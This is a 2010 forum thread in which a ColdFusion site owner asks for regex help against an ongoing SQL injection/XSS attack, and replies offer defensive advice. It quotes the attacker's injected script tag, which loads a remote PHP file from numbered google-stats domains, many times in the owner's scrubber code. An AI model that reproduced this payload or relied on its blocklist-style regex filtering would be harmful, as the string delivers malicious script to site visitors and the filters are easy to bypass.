Reguler Expression Help

Report · Oct 05, 2010

My site is obviously CF and im using sql server 2005 for my database and I have been getting hacked for a couple of days now.

XSS or sql injections and I cant seem to stop it.

I've added portcullis.cfc which is suppose to shop xss and sal injections but it didnt help, I get an email for portcullis stating a user was blocked but the DB is still modified

I changed all cfquerys to stored procedures which I was under the impression would help but nothing, still hacked this morning.

I've updated the server to the latest patches to no avail.

so my last line of defense is "Regular Expressions", reason its my last is I have no clue how to write one.

The offending scrip thats getting injected is "< / t i t l e > < s c r i p t s r c = h t t p : / / g o o g l e - s t a t s 4 9 . i n f o / u r . p h p > </ s c r i p t>"

now where you see stats49, sometimes it is stat49 and other times the 49 is a completly different number

also, there are no spaces in the script but I added them for this purpose as not to inadverntly run the script from this forum

I would appriciate any help I can get in converting this to a Regular expression so I can filter my input

Regards

Craig Wiseman

Report · Oct 05, 2010

First of all is it XSS or SQL INJECTION?

Those are two completely different attack vectors and each take different approaches.

For the latter,

make sure all your queries are using <cfqueryparam...>.(With Caveats)
Limit the database user account used by your ColdFusion code to the minimum permissions required to work.
Make sure there isn't any old code hanging around your server that users may be accessing.

For the former

Users are using your forms to input information. Sanitize ALL inputs from clients, form, url, cookie, etc. They all can be manipulated by hackers.
Store AND|OR display all output from database with htmlEdit() or htmlCode() or similar functions that will escape all output rendering XSS code inoperable, though visible.
Consider the XSS protection settings available in the ColdFusion administrator.
Run careful regex filters to clean up the database and or inspect new inputs. Just be aware that this is an arms race against hackers that few developers have the time, knowledge and|or skills to keep up with. For every counter measure filter created today, a clever hacker will figure away around tomorrow.

Report · Oct 05, 2010

Thaks for the reply ilssac

Thats what im trying to do regarding the RegEx, I just dont know how to write it, I been googling it for 3 days and I still cant get one to work

Report · Oct 05, 2010

BrantNews wrote:
Thats what im trying to do regarding the RegEx,

Well what are you actually trying to match? What have you tried to do? I.E. What are you requirements. What are your issues. And what have you tried.

Report · Oct 05, 2010

Im not sure if you seen the entire post, but down bottom of my orginal post,

there is the offending script, plus I just posted my scrubber with all the offending scripts.

new numbers get added daily

Report · Oct 05, 2010

Oh, I wrote a database scrubber and I think this is somewhat the form of a RegEx is

" <cfset tmpVar = REReplace(jobDescription, "</title><script src=htt p://google-stats50.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://goo gle-s tat50.i nfo/ur.php></s cript>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats49.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats48.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats47.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats45.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats44.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats43.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats46.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats53.info/ur.php></script>", "", "ALL") />
<cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats54.info/ur.php></script>", "", "ALL") /> "

but as you see, the attack changes every day, I need something to scrub and validate the data before it hits the DB, getting it out after works albeit, I have to add in a new line just about every day when the number changes.

Report · Oct 05, 2010

"</title><script src=http://google-stats.*?.info/ur.php></script>"

Should allow you to catch any number, but this is still a very specific filter that will only catch this one attach of the millions of possible variations.

Report · Oct 05, 2010

Is there any reason you need to be so specific? Surely no-one should be posting scripts into your site *at all*, in which case just search for "<script" as the regex then give them the finger.

Report · Oct 05, 2010

yes, that would be perfect.....Thats what I want

Report · Oct 05, 2010

So does that mean its sorted or is there still a problem?

Report · Oct 05, 2010

I would like to know how to write the regex to checkk for just <script>, then remove that entire line, includign the <title> tag

Report · Oct 05, 2010

That should find any <script...>...</script> block.

It says find that string "<script"

plus zero or more characters that are not a closing angle bracket [^>]*

plus zero or more characters that are not an opening angle bracket [^<]*

plus the string </script>

Report · Oct 05, 2010

Thanks Guys, let me implement this and get back to you...

the attacks usually happen between 3 - 7AM

Report · Oct 05, 2010

Thanks, this worked in my scrubber, now I need to add it to my stored procedure to prevent it from getting into the db at all

Report · Oct 05, 2010

Surely you shouldn't need to have *anything* in a stored procedure if you've already stopped it by then?

Report · Oct 05, 2010

This is where im invoking the stored procedure,

its the experience feild getting updated, is this where the regex should go...I was under the impression it went in the stored procedure

Report · Oct 05, 2010

No need, just don't call the sproc in the first place if it's found:

</cfif>

Report · Oct 05, 2010

ok, interesting, let me check it out and see if it works....

Report · Oct 05, 2010

Ok, here is what is happening right now...

I installed a cfc that is suppose to prevent XSS and sql Injections called "portcullis.cfc"

it converts <script> to <invalidTag> and inserts this

</title><InvalidTag src=http://google-stats49.info/ur.php></script> which is fine cause its inert and cannot cause damage.

that being said, when the hacker inserts it, the invalid tag is back to script again and is harmful, this is why I think I needed it in the SPROC

Im fairly new to SPROC and REALLY new to regex, hope Im not asking something too stupid

Report · Oct 05, 2010

If I was in your shoes, I would probably remove this portcullis.cfc and rely on the more blunt denials like previously suggested.

P.S. If you just want to make script, and any html, inert. The htmlEdit() and|or htmlCode() functions will get EVERYTHING with no fancy CFC needed.

Report · Oct 05, 2010

took the advice and removed the cfc but when I manually run it,

it still comes back as <invalidtag> hmmm interesting

Report · Oct 05, 2010

What do you mean by "comes back".

Do you mean new attack code is still getting sanatized into this <invalidtag> version?

Or do you mean that content that was already sanatized is being output by your database?

If previously sanatized content was stored into your database, you have not discussed any process on this forum that would remove that stored content, thus it would continue to appear in your output that references said data.

Report · Oct 05, 2010

What I meant was this...

I removed the portcullis as you recommended///

the portcullis was suppose to change <script> to <invalidTag>

after I deleted the portcullis CFC. I tested my form by injecting a <script>Alert:Hello world</script>

and what got injected into the db was <invalidTag>Alert:Hello world</script>

I do have a scrubber I built that goes into the tables every so often and sanitizes it. I modified my scrubber based on your regex script you provided

Also, untill I can get this thing figured out completly, I and sanatizing the output as well, once the db results are generated, Im outputting the data using rereplace invoking the regex...

I just noticed that the IIS6 was allowing all cgi and isapi extentions to run whick could cause the webserver to be susceptible to computer viruses or worms that exploit these technologies.

I wont really know anything til tomorrow I guess....like i said, the attacks happen from 3 - 7 am..

Thanks for all your help

Report · Oct 05, 2010

Did you just delete the portcullis cfc source code file?

It is quite possible that the cfc object was initiated and stored into a persistant memory location. Until such a time as that memory variable is purged, the code can still be executing. To know more, one would have to learn how this portcullis product is built and used.

Report · Oct 05, 2010

Yup, deleted the cfc and removed the called in Application.cfc

im rebooting the server tonight around 1:am that shoud clean it out...in the mean time, I added a second regEx to clean the <invalidTag> as well

Reguler Expression Help

1 Correct answer